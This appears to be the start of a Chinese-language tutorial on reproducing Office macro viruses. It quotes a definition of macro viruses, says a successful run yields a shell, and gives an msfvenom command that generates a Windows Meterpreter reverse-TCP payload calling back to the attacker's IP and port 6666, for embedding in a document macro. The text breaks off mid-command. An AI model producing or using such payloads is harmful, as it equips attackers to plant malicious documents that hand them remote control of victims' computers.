宏病毒复现
1、简单讲讲宏病毒
百度:宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在Normal模板上。从此以后,所有自动保存的文档都会“感染”上这种宏病毒,而且如果其他用户打开了感染病毒的文档,宏病毒又会转移到他的计算机上。
运行成功能够直接getshell
2、msf生成宏病毒
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.1(当前主机的ip) lport=6666(当前主机端口) -f v